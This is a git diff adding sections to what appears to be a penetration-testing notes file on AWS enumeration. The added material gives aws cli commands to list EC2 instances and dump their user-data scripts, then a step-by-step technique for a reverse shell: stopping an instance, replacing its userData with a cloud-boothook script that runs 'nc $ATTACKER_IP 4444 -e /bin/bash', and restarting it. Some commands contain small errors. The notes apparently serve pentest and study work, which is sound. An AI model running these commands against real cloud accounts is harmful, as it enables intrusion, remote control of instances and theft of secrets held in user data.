diff --git a/Enumeration/AWS.md b/Enumeration/AWS.md
index 560a320..eb7251d 100644
--- a/Enumeration/AWS.md
+++ b/Enumeration/AWS.md
@@ -700,6 +700,27 @@ Deploy service instances of Virtual machines inside a VPC.
 Deployment EC2 instances into 26 regions. Supports multiple OSs.
 On-demand billing.
 
+#### Enumerate EC2 Instances
+
+List EC2 instances in the account via aws cli.
+
+```sh
+aws ec2 describe-instances --query 'Reservations[*].Instances[*].Tags[?Key==`Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --profile PROFILENAME --output json
+```
+List all InstanceIds in the account via aws cli.
+
+```sh
+list=$(aws ec2 describe-instances --region <region_name> --query Reservations[].Instances.InstanceId --output json --profile PROFILENAME) | jq .[] -r
+```
+
+Get user data like cloud-init scripts from the instances via aws cli.
+
+```sh
+for i in $list;do
+  aws ec2 describe-instance-attribute --profile PROFILENAME --instance-id $i --attribute userData --output text --query UserData --region <region_name> | base64 -d | > $i-userdata.txt
+done
+```
+
 #### Connect to an EC2 Instance
 
 Connect to the instance using SSH, RDP, SSM, serial console or webconsole.
@@ -725,6 +746,42 @@ Instance Connect and the SSM Session Manager can be used to reset the root
 password via `sudo passwd root`. After that it is possible to connect to the
 root user, e.g. using serial console or just use `sudo su root` or `su root` directly.
 
+##### Connect to an EC2 Instance Using a Reverse Shell
+
+The InstanceId has to be known, watch [Enumerate EC2 Instances](#Enumerate-EC2-Instances) to get these IDs.
+
+Stop the machine using the InstanceId through aws cli.
+
+```sh
+aws ec2 stop-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
+```
+
+Creat a cloud-init script which contains the reverse shell. The file should contain somethin like the following example, so it will executed at boot time.
+
+```sh
+#cloud-boothook
+#!/bin/bash -x
+apt install -y netcat-traditional && nc $ATTACKER_IP 4444 -e /bin/bash
+```
+
+Encode the shellscript via base64.
+
+```sh
+base64 rev.txt > rev.b64
+```
+
+Upload the encoded file to the stopped instance via aws cli.
+
+```sh
+aws ec2 modify-instance-attribute --profile PROFILENAME --instance-id $INSTANCE_ID --attribute userData --value file://rev.b64
+```
+
+Start the instance with the uploaded file included via aws cli. Wait for the reverse shell to catch up.
+
+```sh
+aws ec2 start-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
+```
+
 #### EC2 and IAM
 
 EC2 instances can use nearly any other service provided by AWS.
@@ -925,3 +982,4 @@ List available load-balancers via aws cli.
 ```sh
 aws elbv2 describe-load-balancers --query Loadbalancers[].DNSName --output text
 ```
+